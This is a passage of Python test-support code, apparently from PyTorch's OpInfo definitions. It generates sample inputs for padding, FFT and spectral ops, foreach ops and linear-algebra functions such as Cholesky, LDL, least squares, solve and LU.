device, dtype, requires_grad, **kwargs): shapes_and_args = ( ((S, 1, S, 1), ()), ((1, 1, 1, 1), ()), ((S, 1, S, 1), (1,)), ((S, 1, S, 1), (-1,)), ((S, 1, S, 1), (2,)), ((S, 1, S, 1), (-2,)), ((), (0, )), ) for shape, args in shapes_and_args: tensor = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) yield SampleInput(tensor, args=args) def sample_inputs_nn_pad(op_info, device, dtype, requires_grad, mode, **kwargs): assert mode in ('constant', 'reflect', 'replicate', 'circular') if mode in ['reflect', 'replicate']: cases: tuple = ( # ignore ((1, 3), (1, 2)), ((1, 3), (0, 1)), ((0, 3, 3), (1, 2)), ((0, 3, 3), (0, 1)), ((1, 3, 3), (1, 2)), ((1, 3, 3), (0, 1)), ((1, 3, 3), (0, 2, 0, 1)), ((0, 3, 3, 3), (0, 2, 0, 1)), ((3, 3, 5, 5), (0, 2, 0, 1)), ((3, 3, 5, 5), (1, 1, 1, 1, 1, 1)), ((1, 3, 3, 3, 3), (1, 1, 1, 1, 1, 1)), ((1, 3, 4, 4), (-1, 1, -2, 1)), ) elif mode == 'constant': cases = ( ((1, 3), (1, 2)), ((1, 3), (0, 1)), ((1, 3), (0, 2, 0, 1)), ((0, 3, 3), (1, 2)), ((0, 3, 3), (0, 1)), ((0, 3, 3), (0, 2, 0, 1)), ((0, 3, 3), (1, 1, 1, 1, 1, 1)), ((1, 3, 3), (1, 2)), ((1, 3, 3), (0, 1)), ((1, 3, 3), (0, 2, 0, 1)), ((1, 3, 3), (1, 1, 1, 1, 1, 1)), ((0, 3, 3, 3), (1, 2)), ((0, 3, 3, 3), (0, 1)), ((0, 3, 3, 3), (0, 2, 0, 1)), ((0, 3, 3, 3), (1, 1, 1, 1, 1, 1)), ((3, 3, 5, 5), (1, 2)), ((3, 3, 5, 5), (0, 1)), ((3, 3, 5, 5), (0, 2, 0, 1)), ((3, 3, 5, 5), (1, 1, 1, 1, 1, 1)), ((1, 3, 3, 3, 3), (1, 2)), ((1, 3, 3, 3, 3), (0, 1)), ((1, 3, 3, 3, 3), (0, 2, 0, 1)), ((1, 3, 3, 3, 3), (1, 1, 1, 1, 1, 1)), ((1, 3, 4, 4), (-1, 1, -2, 1)), ) else: # mode == 'circular' if dtype == torch.bool: # test_dtypes fails on ASAN with for the case ab # runtime error: load of value 190, which is not a valid value for type 'bool' # Reference: https://github.com/pytorch/pytorch/pull/62814#issuecomment-894156562 # Reference Issue: https://github.com/pytorch/pytorch/issues/63034 cases = ( ((2, 3, 3), (1, 2)), ((1, 3, 3), (1, 2)), ) else: cases = ( ((0, 3, 3), (1, 2)), ((0, 3, 3), (0, 1)), ((1, 3, 3), (1, 2)), ((1, 3, 3), (0, 1)), ((0, 3, 3, 3), (0, 2, 0, 1)), ((3, 3, 5, 5), (0, 2, 0, 1)), ((1, 3, 3, 3, 3), (1, 1, 1, 1, 1, 1)), ((1, 3, 4, 4), (-1, 1, -2, 1)), ) make_inp = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) if mode == 'constant': # Default args yield SampleInput(make_inp((1, 3, 3)), args=((2, 2),)) if mode in ['reflect', 'replicate', 'circular']: for shape, pad in cases: yield SampleInput(make_inp(shape), args=(pad, mode)) else: # mode == 'constant' for pad_value in (1., 2.): for shape, pad in cases: yield SampleInput(make_inp(shape), args=(pad, mode, pad_value)) # TODO: reconcile with torch.linalg.det and torch.linalg.slogdet # Creates matrices with a positive nonzero determinant def sample_inputs_logdet(op_info, device, dtype, requires_grad, **kwargs): def make_nonzero_det(A, *, sign=1, min_singular_value=0.1, **kwargs): u, s, vh = torch.linalg.svd(A, full_matrices=False) s.clamp_(min=min_singular_value) A = (u * s.unsqueeze(-2)) @ vh det = A.det() if sign is not None: if A.dim() == 2: if (det < 0) ^ (sign < 0): A[0, :].neg_() else: cond = ((det < 0) ^ (sign < 0)).nonzero() if cond.size(0) > 0: for i in range(cond.size(0)): A[list(cond[i])][0, :].neg_() return A # cases constructed using make_tensor() tensor_shapes = ( (S, S), (1, 1), (3, 3, S, S), (3, 3, 1, 1) ) for shape in tensor_shapes: t = make_tensor(shape, device=device, dtype=dtype) d = make_nonzero_det(t).requires_grad_(requires_grad) yield SampleInput(d) # cases constructed 
using:
    # 1) make_symmetric_matrices
    # 2) make_symmetric_pd_matrices
    # 3) make_fullrank_matrices_with_distinct_singular_values
    symmetric_shapes = (
        (S, S),
        (3, S, S),
    )

    def _helper(constructor, *shape, **kwargs):
        t = constructor(*shape, device=device, dtype=dtype)
        d = make_nonzero_det(t, **kwargs).requires_grad_(requires_grad)
        yield SampleInput(d)

    for shape in symmetric_shapes:
        # _helper is a generator, so its samples must be re-yielded here
        yield from _helper(make_symmetric_matrices, *shape)
        yield from _helper(make_symmetric_pd_matrices, *shape)
        yield from _helper(make_fullrank_matrices_with_distinct_singular_values, *shape, min_singular_value=0)

def np_unary_ufunc_integer_promotion_wrapper(fn):
    # Wrapper that passes PyTorch's default scalar
    # type as an argument to the wrapped NumPy
    # unary ufunc when given an integer input.
    # This mimics PyTorch's integer->floating point
    # type promotion.
    #
    # This is necessary when NumPy promotes
    # integer types to double, since PyTorch promotes
    # integer types to the default scalar type.

    # Helper to determine if promotion is needed
    def is_integral(dtype):
        return dtype in [np.bool_, bool, np.uint8, np.int8, np.int16, np.int32, np.int64]

    @wraps(fn)
    def wrapped_fn(x):
        # As the default dtype can change, acquire it when function is called.
        # NOTE: Promotion in PyTorch is from integer types to the default dtype
        np_dtype = torch_to_numpy_dtype_dict[torch.get_default_dtype()]

        if is_integral(x.dtype):
            return fn(x.astype(np_dtype))
        return fn(x)

    return wrapped_fn

def sample_inputs_spectral_ops(self, device, dtype, requires_grad=False, **kwargs):
    is_fp16_or_chalf = dtype == torch.complex32 or dtype == torch.half
    if not is_fp16_or_chalf:
        nd_tensor = partial(make_tensor, (S, S + 1, S + 2), device=device,
                            dtype=dtype, requires_grad=requires_grad)
        oned_tensor = partial(make_tensor, (31,), device=device,
                              dtype=dtype, requires_grad=requires_grad)
    else:
        # cuFFT supports powers of 2 for half and complex half precision
        # NOTE: For hfft, hfft2, hfftn, irfft, irfft2, irfftn with default args
        # where output_size n=2*(input_size - 1), we make sure that logical fft size is a power of two
        if self.name in ['fft.hfft', 'fft.irfft']:
            shapes = ((2, 9, 9), (33,))
        elif self.name in ['fft.hfft2', 'fft.irfft2']:
            shapes = ((2, 8, 9), (33,))
        elif self.name in ['fft.hfftn', 'fft.irfftn']:
            shapes = ((2, 2, 33), (33,))
        else:
            shapes = ((2, 8, 16), (32,))
        nd_tensor = partial(make_tensor, shapes[0], device=device,
                            dtype=dtype, requires_grad=requires_grad)
        oned_tensor = partial(make_tensor, shapes[1], device=device,
                              dtype=dtype, requires_grad=requires_grad)

    if self.ndimensional == SpectralFuncType.ND:
        return [
            SampleInput(nd_tensor(),
                        kwargs=dict(s=(3, 10) if not is_fp16_or_chalf else (4, 8),
                                    dim=(1, 2), norm='ortho')),
            SampleInput(nd_tensor(), kwargs=dict(norm='ortho')),
            SampleInput(nd_tensor(), kwargs=dict(s=(8,))),
            SampleInput(oned_tensor()),
            *(SampleInput(nd_tensor(), kwargs=dict(dim=dim))
              for dim in [-1, -2, -3, (0, -1)]),
        ]
    elif self.ndimensional == SpectralFuncType.TwoD:
        return [
            SampleInput(nd_tensor(),
                        kwargs=dict(s=(3, 10) if not is_fp16_or_chalf else (4, 8),
                                    dim=(1, 2), norm='ortho')),
            SampleInput(nd_tensor(), kwargs=dict(norm='ortho')),
            SampleInput(nd_tensor(), kwargs=dict(s=(6, 8) if not is_fp16_or_chalf else (4, 8))),
            SampleInput(nd_tensor(), kwargs=dict(dim=0)),
            SampleInput(nd_tensor(), kwargs=dict(dim=(0, -1))),
            SampleInput(nd_tensor(), kwargs=dict(dim=(-3, -2, -1))),
        ]
    else:
        return [
            SampleInput(nd_tensor(),
                        kwargs=dict(n=10 if not is_fp16_or_chalf else 8,
                                    dim=1, norm='ortho')),
            SampleInput(nd_tensor(), kwargs=dict(norm='ortho')),
            SampleInput(nd_tensor(), kwargs=dict(n=7 if
not is_fp16_or_chalf else 8) ), SampleInput(oned_tensor()), *(SampleInput(nd_tensor(), kwargs=dict(dim=dim)) for dim in [-1, -2, -3]), ] def sample_inputs_repeat_interleave(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) return [ SampleInput(make_input(()), kwargs=dict(repeats=2)), SampleInput(make_input((2, 3, 4)), kwargs=dict(repeats=2)), SampleInput(make_input((2, 3, 4)), kwargs=dict(repeats=2, dim=1)), SampleInput(make_input((2, 3, 4)), kwargs=dict(repeats=torch.arange(3, device=device), dim=1)) ] SpectralFuncType = Enum('SpectralFuncType', ('OneD', 'TwoD', 'ND')) # Metadata class for Fast Fourier Transforms in torch.fft. class SpectralFuncInfo(OpInfo): """Operator information for torch.fft transforms. """ def __init__(self, name, # the string name of the function *, ref=None, # Reference implementation (probably in np.fft namespace) dtypes=floating_and_complex_types(), ndimensional: SpectralFuncType, sample_inputs_func=sample_inputs_spectral_ops, decorators=None, **kwargs): decorators = list(decorators) if decorators is not None else [] decorators += [ skipCPUIfNoFFT, DecorateInfo(toleranceOverride({torch.chalf: tol(4e-2, 4e-2)}), "TestCommon", "test_complex_half_reference_testing") ] super().__init__(name=name, dtypes=dtypes, decorators=decorators, sample_inputs_func=sample_inputs_func, **kwargs) self.ref = ref self.ndimensional = ndimensional def sample_inputs_stft(op_info, device, dtype, requires_grad, **kwargs): def mt(shape, **kwargs): return make_tensor(shape, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs) yield SampleInput(mt(100), kwargs=dict(n_fft=10)) for center in [False, True]: yield SampleInput(mt(10), kwargs=dict(n_fft=7, center=center)) yield SampleInput(mt((10, 100)), kwargs=dict(n_fft=16, hop_length=4, center=center)) window = make_tensor(16, low=.5, high=2.0, dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput( mt((2, 100)), kwargs=dict(n_fft=16, window=window, return_complex=True, center=center)) yield SampleInput( mt((3, 100)), kwargs=dict(n_fft=16, window=window, return_complex=True, center=center)) if not dtype.is_complex: yield SampleInput( mt((10, 100)), kwargs=dict(n_fft=16, window=window, onesided=False)) def sample_inputs_istft(op_info, device, dtype, requires_grad, **kwargs): def mt(shape, **kwargs): real_shape = shape if dtype.is_complex else shape + (2,) return make_tensor(real_shape, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs) yield SampleInput(mt((10, 2)), kwargs=dict(n_fft=10)) yield SampleInput(mt((6, 3)), kwargs=dict(n_fft=6, onesided=False)) yield SampleInput(mt((6, 4)), kwargs=dict(n_fft=10, onesided=True)) for center in [False, True]: yield SampleInput(mt((10, 10, 6)), kwargs=dict(n_fft=10, center=center)) yield SampleInput(mt((1, 9, 10)), kwargs=dict(n_fft=16, hop_length=4, center=center)) window = make_tensor(10, low=.5, high=2.0, dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(mt((10, 10, 6)), kwargs=dict( n_fft=10, window=window, center=center, return_complex=dtype.is_complex)) yield SampleInput(mt((10, 10, 10)), kwargs=dict( n_fft=10, window=window[:8], win_length=8, center=center, return_complex=True)) real_window = window if not dtype.is_complex else window.real yield SampleInput(mt((10, 5, 6)), kwargs=dict(n_fft=8, window=real_window[:8], center=center)) def sample_inputs_fftshift(op_info, device, dtype, requires_grad, **kwargs): def mt(shape, **kwargs): 
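        # Local shorthand: threads the enclosing device/dtype/requires_grad
        # into make_tensor for every requested shape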
return make_tensor(shape, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs) yield SampleInput(mt((9, 10))) yield SampleInput(mt((50,)), kwargs=dict(dim=0)) yield SampleInput(mt((5, 11)), kwargs=dict(dim=(1,))) yield SampleInput(mt((5, 6)), kwargs=dict(dim=(0, 1))) yield SampleInput(mt((5, 6, 2)), kwargs=dict(dim=(0, 2))) class ShapeFuncInfo(OpInfo): """Early version of a specialized OpInfo for Shape manipulating operations like tile and roll""" def __init__(self, name, # the string name of the function *, ref, # a reference function dtypes=floating_types(), dtypesIfCUDA=None, dtypesIfROCM=None, sample_inputs_func=None, **kwargs): super(ShapeFuncInfo, self).__init__(name, dtypes=dtypes, dtypesIfCUDA=dtypesIfCUDA, dtypesIfROCM=dtypesIfROCM, sample_inputs_func=sample_inputs_func, **kwargs) self.ref = ref def sample_inputs_foreach(self, device, dtype, N, *, noncontiguous=False, same_size=False, low=None, high=None): if same_size: return [make_tensor((N, N), dtype=dtype, device=device, noncontiguous=noncontiguous) for _ in range(N)] else: return [make_tensor((N - i, N - i), dtype=dtype, device=device, noncontiguous=noncontiguous) for i in range(N)] def get_foreach_method_names(name): # get torch inplace reference function op_name = "_foreach_" + name inplace_op_name = "_foreach_" + name + "_" op = getattr(torch, op_name, None) inplace_op = getattr(torch, inplace_op_name, None) ref = getattr(torch, name, None) ref_inplace = getattr(torch.Tensor, name + "_", None) return op, inplace_op, ref, ref_inplace class ForeachFuncInfo(OpInfo): """Early version of a specialized OpInfo for foreach functions""" def __init__(self, name, dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types_and(torch.half), dtypesIfROCM=None, supports_alpha_param=False, sample_inputs_func=sample_inputs_foreach, **kwargs): super().__init__( "_foreach_" + name, dtypes=dtypes, dtypesIfCUDA=dtypesIfCUDA, dtypesIfROCM=dtypesIfROCM, sample_inputs_func=sample_inputs_func, **kwargs ) foreach_method, foreach_method_inplace, torch_ref_method, torch_ref_inplace = get_foreach_method_names(name) self.method_variant = foreach_method self.inplace_variant = foreach_method_inplace self.ref = torch_ref_method self.ref_inplace = torch_ref_inplace self.supports_alpha_param = supports_alpha_param if name == "norm": self.ref = torch.linalg.vector_norm def sample_inputs_linalg_cholesky_inverse(op_info, device, dtype, requires_grad=False, **kwargs): from torch.testing._internal.common_utils import random_well_conditioned_matrix # Cholesky factorization is for positive-definite matrices single_well_conditioned_matrix = random_well_conditioned_matrix(S, S, dtype=dtype, device=device) batch_well_conditioned_matrices = random_well_conditioned_matrix(2, S, S, dtype=dtype, device=device) single_pd = single_well_conditioned_matrix @ single_well_conditioned_matrix.mH batch_pd = batch_well_conditioned_matrices @ batch_well_conditioned_matrices.mH inputs = ( torch.zeros(0, 0, dtype=dtype, device=device), # 0x0 matrix torch.zeros(0, 2, 2, dtype=dtype, device=device), # zero batch of matrices single_pd, batch_pd ) test_cases = (torch.linalg.cholesky(a, upper=False) for a in inputs) for l in test_cases: # generated lower-triangular samples l.requires_grad = requires_grad yield SampleInput(l) # upper=False by default yield SampleInput(l.detach().clone().requires_grad_(requires_grad), kwargs=dict(upper=False)) # generate upper-triangular inputs u = l.detach().clone().mT.contiguous().requires_grad_(requires_grad) yield 
SampleInput(u, kwargs=dict(upper=True)) def sample_inputs_linalg_ldl_factor(op_info, device, dtype, requires_grad=False, **kwargs): from torch.testing._internal.common_utils import ( random_hermitian_pd_matrix, random_symmetric_pd_matrix, ) device = torch.device(device) # Symmetric inputs yield SampleInput( random_symmetric_pd_matrix(S, dtype=dtype, device=device), kwargs=dict(hermitian=False), ) # single matrix yield SampleInput( random_symmetric_pd_matrix(S, 2, dtype=dtype, device=device), kwargs=dict(hermitian=False), ) # batch of matrices yield SampleInput( torch.zeros(0, 0, dtype=dtype, device=device), kwargs=dict(hermitian=False) ) # 0x0 matrix yield SampleInput( torch.zeros(0, 2, 2, dtype=dtype, device=device), kwargs=dict(hermitian=False) ) # zero batch of matrices # Hermitian inputs # hermitian=True for complex inputs on CUDA is supported only with MAGMA 2.5.4+ magma_254_available = device.type == 'cuda' and _get_magma_version() >= (2, 5, 4) if dtype.is_complex and (device.type == 'cpu' or magma_254_available): yield SampleInput( random_hermitian_pd_matrix(S, dtype=dtype, device=device), kwargs=dict(hermitian=True), ) # single matrix yield SampleInput( random_hermitian_pd_matrix(S, 2, dtype=dtype, device=device), kwargs=dict(hermitian=True), ) # batch of matrices def sample_inputs_linalg_ldl_solve(op_info, device, dtype, requires_grad=False, **kwargs): # Generate LDL factors of symmetric (and Hermitian on CPU) matrices from torch.testing._internal.common_utils import random_hermitian_pd_matrix, random_symmetric_pd_matrix device = torch.device(device) symmetric_inputs = ( random_symmetric_pd_matrix(S, dtype=dtype, device=device), # single matrix random_symmetric_pd_matrix(S, 2, dtype=dtype, device=device), # batch of matrices torch.zeros(0, 0, dtype=dtype, device=device), # 0x0 matrix torch.zeros(0, 2, 2, dtype=dtype, device=device), # zero batch of matrices ) hermitian_inputs = ( random_hermitian_pd_matrix(S, dtype=dtype, device=device), random_hermitian_pd_matrix(S, 2, dtype=dtype, device=device), ) if device.type == 'cpu' and dtype.is_complex else () test_cases1 = (torch.linalg.ldl_factor_ex(a, hermitian=False) for a in symmetric_inputs) test_cases2 = (torch.linalg.ldl_factor_ex(a, hermitian=True) for a in hermitian_inputs) # Symmetric case for test_case in test_cases1: factors, pivots, _ = test_case factors.requires_grad = requires_grad for B_batch_shape in ((), factors.shape[:-2]): B = make_tensor((*B_batch_shape, factors.shape[-1], S), device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(factors, args=(pivots, B), kwargs=dict(hermitian=False)) clone_factors = factors.detach().clone().requires_grad_(requires_grad) yield SampleInput(clone_factors, args=(pivots, B), kwargs=dict(hermitian=False)) # Hermitian case for test_case in test_cases2: factors, pivots, _ = test_case factors.requires_grad = requires_grad for B_batch_shape in ((), factors.shape[:-2]): B = make_tensor((*B_batch_shape, factors.shape[-1], S), device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(factors, args=(pivots, B), kwargs=dict(hermitian=True)) clone_factors = factors.detach().clone().requires_grad_(requires_grad) yield SampleInput(clone_factors, args=(pivots, B), kwargs=dict(hermitian=True)) def sample_inputs_linalg_lstsq(op_info, device, dtype, requires_grad=False, **kwargs): from torch.testing._internal.common_utils import random_well_conditioned_matrix device = torch.device(device) drivers: Tuple[str, ...] 
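    # Driver availability is backend-dependent: on CUDA only 'gels' is
    # supported, while CPU (LAPACK) also provides 'gelsy', 'gelss' and 'gelsd'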
if device.type == 'cuda':
        drivers = ('gels',)
    else:
        drivers = ('gels', 'gelsy', 'gelss', 'gelsd')

    # we generate matrices of shape (..., n + delta, n)
    deltas: Tuple[int, ...]
    if device.type == 'cpu' or has_cusolver():
        deltas = (-1, 0, +1)
    # only square systems if cuSOLVER is not available,
    # because we solve an lstsq problem with a transposed matrix in the backward
    else:
        deltas = (0,)

    out = []
    for batch, driver, delta in product(((), (3,), (3, 3)), drivers, deltas):
        shape = batch + (3 + delta, 3)
        a = random_well_conditioned_matrix(*shape, dtype=dtype, device=device)
        a.requires_grad_(requires_grad)
        b = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)
        out.append(SampleInput(a, args=(b,), kwargs=dict(driver=driver)))
    return out

def sample_inputs_householder_product(op_info, device, dtype, requires_grad, **kwargs):
    """
    This function generates input for torch.linalg.householder_product (torch.orgqr).
    The first argument should be a square matrix or batch of square matrices,
    the second argument is a vector or batch of vectors.
    Empty, square, rectangular, batched square and batched rectangular inputs are generated.
    """
    # Each column of the matrix is getting multiplied many times leading to very large values for
    # the Jacobian matrix entries and making the finite-difference result of grad check less accurate.
    # That's why gradcheck with the default range [-9, 9] fails and [-2, 2] is used here.
    samples = (
        SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),
                    args=(make_tensor((S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)),

        SampleInput(make_tensor((S + 1, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),
                    args=(make_tensor((S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)),

        SampleInput(make_tensor((2, 1, S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),
                    args=(make_tensor((2, 1, S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)),

        SampleInput(make_tensor((2, 1, S + 1, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),
                    args=(make_tensor((2, 1, S,), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),)),

        SampleInput(make_tensor((0, 0), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
                    args=(make_tensor((0,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)),

        SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),
                    args=(make_tensor((0,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)),

        # m = n = S, k = S - 2
        SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),
                    args=(make_tensor((S - 2,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)),

        # m = S, n = S - 1, k = S - 2
        SampleInput(make_tensor((S, S - 1), dtype=dtype, device=device, low=-2, high=2, requires_grad=requires_grad),
                    args=(make_tensor((S - 2,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)),
    )

    return samples

def sample_inputs_ormqr(op_info, device, dtype, requires_grad, **kwargs):
    # create a helper function wrapping `make_tensor`
    make_input = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    def gen_inputs():
        batches = [(), (0, ), (2, ), (2, 1)]
        ns = [5, 2, 0]
        tf = [True,
False] for batch, (m, n), left, transpose in product(batches, product(ns, ns), tf, tf): reflectors = make_input((*batch, m, n)) tau = make_input((*batch, min(m, n))) other_matrix_shape = (m, n) if left else (n, m) other = make_input((*batch, *other_matrix_shape)) kwargs = {"left": left, "transpose": transpose} yield SampleInput(reflectors, args=(tau, other,), kwargs=kwargs) return tuple(gen_inputs()) def sample_inputs_linalg_cholesky(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates always positive-definite input for torch.linalg.cholesky using random_hermitian_pd_matrix. The input is generated as the itertools.product of 'batches' and 'ns'. In total this function generates 8 SampleInputs 'batches' cases include: () - single input, (0,) - zero batched dimension, (2,) - batch of two matrices, (1, 1) - 1x1 batch of matrices 'ns' gives 0x0 and 5x5 matrices. Zeros in dimensions are edge cases in the implementation and important to test for in order to avoid unexpected crashes. """ from torch.testing._internal.common_utils import random_hermitian_pd_matrix batches = [(), (0, ), (2, ), (1, 1)] ns = [5, 0] out = [] for batch, n, upper in product(batches, ns, [True, False]): a = random_hermitian_pd_matrix(n, *batch, dtype=dtype, device=device) a.requires_grad = requires_grad out.append(SampleInput(a, kwargs={"upper": upper})) return out def sample_inputs_symeig(op_info, device, dtype, requires_grad=False, **kwargs): out = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad) for o in out: o.kwargs = {"upper": bool(np.random.choice([True, False])), "eigenvectors": True} # A gauge-invariant function o.output_process_fn_grad = lambda output: (output[0], abs(output[1])) yield o def sample_inputs_linalg_eig(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates input for torch.linalg.eig """ def out_fn(output): return output[0], abs(output[1]) samples = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad) for sample in samples: sample.output_process_fn_grad = out_fn yield sample def sample_inputs_linalg_eigh(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates input for torch.linalg.eigh/eigvalsh with UPLO="U" or "L" keyword argument. """ def out_fn(output): if isinstance(output, tuple): # eigh function return output[0], abs(output[1]) else: # eigvalsh function return output # Samples do not need to be Hermitian, as we're using gradcheck_wrapper_hermitian_input samples = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad) for sample in samples: sample.kwargs = {"UPLO": np.random.choice(["L", "U"])} sample.output_process_fn_grad = out_fn yield sample def sample_inputs_linalg_slogdet(op_info, device, dtype, requires_grad=False, **kwargs): def out_fn(output): return output[1] samples = sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad) for sample in samples: sample.output_process_fn_grad = out_fn yield sample def sample_inputs_linalg_pinv(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates input for torch.linalg.pinv with hermitian=False keyword argument. 
""" for o in sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad, **kwargs): real_dtype = o.input.real.dtype if dtype.is_complex else dtype # requires_grad path for rtol tensor is not implemented for rtol in (None, 1.0, torch.tensor(1.0, dtype=real_dtype, device=device)): o = clone_sample(o) o.kwargs = {"rtol": rtol} yield o def sample_inputs_linalg_pinv_hermitian(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates input for torch.linalg.pinv with hermitian=True keyword argument. """ for o in sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad, **kwargs): o.kwargs = {"hermitian": True} yield o def sample_inputs_linalg_solve(op_info, device, dtype, requires_grad=False, vector_rhs_allowed=True, **kwargs): """ This function generates always solvable input for torch.linalg.solve We sample a fullrank square matrix (i.e. invertible) A The first input to torch.linalg.solve is generated as the itertools.product of 'batches' and 'ns'. The second input is generated as the product of 'batches', 'ns' and 'nrhs'. In total this function generates 18 SampleInputs 'batches' cases include: () - single input, (0,) - zero batched dimension, (2,) - batch of two matrices. 'ns' gives 0x0 and 5x5 matrices. and 'nrhs' controls the number of vectors to solve for: () - using 1 as the number of vectors implicitly (1,) - same as () but explicit (3,) - solve for 3 vectors. Zeros in dimensions are edge cases in the implementation and important to test for in order to avoid unexpected crashes. 'vector_rhs_allowed' controls whether to include nrhs = () to the list of SampleInputs. torch.solve / triangular_solve / cholesky_solve (opposed to torch.linalg.solve) do not allow 1D tensors (vectors) as the right-hand-side. Once torch.solve / triangular_solve / cholesky_solve and its testing are removed, 'vector_rhs_allowed' may be removed here as well. """ make_fullrank = make_fullrank_matrices_with_distinct_singular_values make_a = partial(make_fullrank, dtype=dtype, device=device, requires_grad=requires_grad) make_b = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) batches = [(), (0, ), (2, )] ns = [5, 0] if vector_rhs_allowed: nrhs = [(), (1,), (3,)] else: nrhs = [(1,), (3,)] for n, batch, rhs in product(ns, batches, nrhs): yield SampleInput(make_a(*batch, n, n), args=(make_b((batch + (n,) + rhs)),)) def sample_inputs_linalg_solve_triangular(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device) bs = (1, 2, 0) ns = (3, 0) ks = (1, 3, 0) for b, n, k, (left, upper, uni) in product(bs, ns, ks, product((True, False), repeat=3)): if b == 1: A = make_arg((n, n)) if left else make_arg((k, k)) B = make_arg((n, k)) else: A = make_arg((b, n, n)) if left else make_arg((b, k, k)) B = make_arg((b, n, k)) if uni: # Not really necessary, but writing it for consistency A.diagonal(0, -2, -1).fill_(1.) else: d = A.diagonal(0, -2, -1) d[d.abs() < 1e-6] = 1. 
if upper: A.triu_() else: A.tril_() kwargs = {"upper": upper, "left": left, "unitriangular": uni} if requires_grad: for grad_A, grad_B in product((True, False), repeat=2): # Either A or B needs to have a gradient if not grad_A and not grad_B: continue yield SampleInput( A.clone().requires_grad_(grad_A), args=(B.clone().requires_grad_(grad_B),), kwargs=kwargs) else: yield SampleInput(A, args=(B,), kwargs=kwargs) def sample_inputs_legacy_solve(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates always solvable input for legacy solve functions (the ones that are not in torch.linalg module). The difference from sample_inputs_linalg_solve is that here the right-hand-side of A x = b equation should have b.ndim >= 2, vectors are not allowed. Also the arguments order is swapped. """ out = sample_inputs_linalg_solve( op_info, device, dtype, requires_grad=requires_grad, vector_rhs_allowed=False ) # Reverses tensor order for sample in out: sample.input, sample.args = sample.args[0], (sample.input,) yield sample def sample_inputs_cholesky_solve(op_info, device, dtype, requires_grad=False, **kwargs): cholesky_inverse_samples = sample_inputs_linalg_cholesky_inverse( op_info, device, dtype, requires_grad=False ) for sample in cholesky_inverse_samples: psd_matrix = sample.input sample.input = make_tensor(psd_matrix.shape, dtype=dtype, device=device, requires_grad=requires_grad, low=None, high=None) sample.args = (psd_matrix.requires_grad_(requires_grad),) yield sample def sample_inputs_lu(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_fullrank_matrices_with_distinct_singular_values, dtype=dtype, device=device, requires_grad=requires_grad) # not needed once OpInfo tests support Iterables batch_shapes = ((), (3,), (3, 3)) for batch_shape, get_infos, size_delta in product(batch_shapes, (True, False), (-2, -1, 0, +1, +2)): shape = batch_shape + (S + size_delta, S) input = make_arg(*shape) yield SampleInput(input, args=(True, get_infos)) def sample_inputs_linalg_lu(op_info, device, dtype, requires_grad=False, **kwargs): full_rank = (op_info.name == "linalg.lu_factor") make_fn = make_tensor if not full_rank else make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_fn, dtype=dtype, device=device, requires_grad=requires_grad) def out_fn(output): if op_info.name in ("linalg.lu"): return output[1], output[2] else: return output batch_shapes = ((), (3,), (3, 3)) # pivot=False only supported in CUDA pivots = (True, False) if torch.device(device).type == "cuda" else (True,) deltas = (-2, -1, 0, +1, +2) for batch_shape, pivot, delta in product(batch_shapes, pivots, deltas): shape = batch_shape + (S + delta, S) # Insanely annoying that make_fullrank_blablabla accepts a *shape and not a tuple! 
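        # make_tensor expects a shape tuple while the fullrank factory takes
        # unpacked dimensions, hence the two call styles below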
